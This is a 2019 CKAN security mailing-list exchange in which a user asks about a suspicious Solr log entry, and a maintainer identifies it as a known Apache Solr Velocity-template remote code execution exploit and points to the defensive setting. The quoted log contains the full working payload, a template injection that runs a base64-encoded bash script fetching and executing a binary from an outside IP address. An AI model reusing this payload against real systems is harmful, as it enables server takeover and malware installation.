[CKAN-Security] Vulnerability in the WIld

Wed Nov 6 18:51:14 UTC 2019

Hello.

This is not a CKAN exploit, but an exploit in Solr allowing remote code
execution. It is copied from
https://github.com/AleWong/Apache-Solr-RCE-via-Velocity-template.
Are you sure this actually affected you? You will see garbage in the logs
that did nothing all the time as bots try to find exploits. Make sure
VelocityResponseWriter is disabled (should be by default) and this exploit
will do nothing.

Thank you,
Tyler Kennedy

On Wed, Nov 6, 2019 at 12:49 PM Fabian Fink <fink at h0st.space> wrote:

> Ckan 2.8.x
> Solr 6.6.x
> Solr Logs:
>  webapp=/solr path=/select
> params={q=1&v.template=custom&v.template.custom=#set($x%3D'')+#set($rt%3D$x.class.forName('java.lang.Runtime'))+#set($chr%3D$x.class.forName('java.lang.Character'))+#set($str%3D$x.class.forName('java.lang.String'))+#set($ex%3D$rt.getRuntime().exec('/bin/bash+-c+{echo,ICAvdXNyL2Jpbi9jdXJsIC1vIC9yb290L3J0ZXIgaHR0cDovLzE5NC4yNDkuMC4xNjcvc2l0ZXMvZGVmYXVsdC9maWxlcy9zeW5jIDsgY2htb2QgK3ggL3Jvb3QvcnRlciA7IGNobW9kIDc3NyAvcm9vdC9ydGVyIDsgL3Jvb3QvcnRlciA7ICAvcm9vdC9ydGVyIDI+JjEgOyAgL3Vzci9iaW4vY3VybCAtbyAvdG1wL2VydGEgaHR0cDovLzE5NC4yNDkuMC4xNjcvc2l0ZXMvZGVmYXVsdC9maWxlcy9zeW5jIDsgY2htb2QgK3ggL3RtcC9lcnRhIDsgY2htb2QgNzc3IC90bXAvZXJ0YSA7IC90bXAvZXJ0YSA7ICAvdG1wL2VydGEgOyAvdXNyL2Jpbi93Z2V0ICAtTyAvaG9tZS9zbyovZmVydCAgIGh0dHA6Ly8xOTQuMjQ5LjAuMTY3L3NpdGVzL2RlZmF1bHQvZmlsZXMvc3luYyA7IGNobW9kIDc3NyAvaG9tZS9zbyovZmVydCAgIDsgL2hvbWUvc28qL2ZlcnQgOyAvaG9tZS9zbyovZmVydCAgOyAvdXNyL2Jpbi9jdXJsIC1vIC92YXIvdG1wL2V0ZmV0IGh0dHA6Ly8xOTQuMjQ5LjAuMTY3L3NpdGVzL2RlZmF1bHQvZmlsZXMvc3luYyAgOyAgY2htb2QgNzc3IC92YXIvdG1wL2V0ZmV0IDsgL3Zhci90bXAvZXRmZXQgOyAvdXNyL2Jpbi93Z2V0YWsgLU8gL3Zhci90bXAvcnRzZnYgIGh0dHA6Ly8xOTQuMjQ5LjAuMTY3L3NpdGVzL2RlZmF1bHQvZmlsZXMvc3luYyA7IGNobW9kIDc3NyAvdmFyL3RtcC9ydHNmdiAgOyAvdmFyL3RtcC9ydHNmdiA7IC92YXIvdG1wL3J0c2Z2IDsgIC91c3IvYmluL2N1cmwgLW8gL2Rldi9zaG0vcmV1ZXIgaHR0cDovLzE5NC4yNDkuMC4xNjcvc2l0ZXMvZGVmYXVsdC9maWxlcy9zeW5jICA7ICBjaG1vZCA3NzcgL2Rldi9zaG0vcmV1ZXIgIDsvZGV2L3NobS9yZXVlciAgOyAgIC91c3IvYmluL3dnZXQgLU8gL2Rldi9zaG0vcmV1ZXIgaHR0cDovLzE5NC4yNDkuMC4xNjcvc2l0ZXMvZGVmYXVsdC9maWxlcy9zeW5jIDsgY2htb2QgNzc3IC9kZXYvc2htL3JldWVyICA7IC9kZXYvc2htL3JldWVyIA%3D%3D}|{base64,-d}|{bash,-i}'))+$ex.waitFor()+#set($out%3D$ex.getInputStream())+#foreach($i+in+[1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end&wt=velocity}
> hits=0 status=0 QTime=0
>
> any version unaffected?
> how could we fix it?
>
> --
> You received this message because you are subscribed to the Google Groups
> "CKAN Security" group.
> To unsubscribe from this group and stop receiving emails from it, send an
> email to security+unsubscribe at ckan.org.
> _______________________________________________
> CKAN security
> https://lists.okfn.org/mailman/listinfo/security
> https://lists.okfn.org/mailman/options/security/tk%40tkte.ch
>
> Repo: https://github.com/ckan/ckan-security
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <https://lists.okfn.org/mailman/private/security/attachments/20191106/ee3c71fc/attachment-0001.html>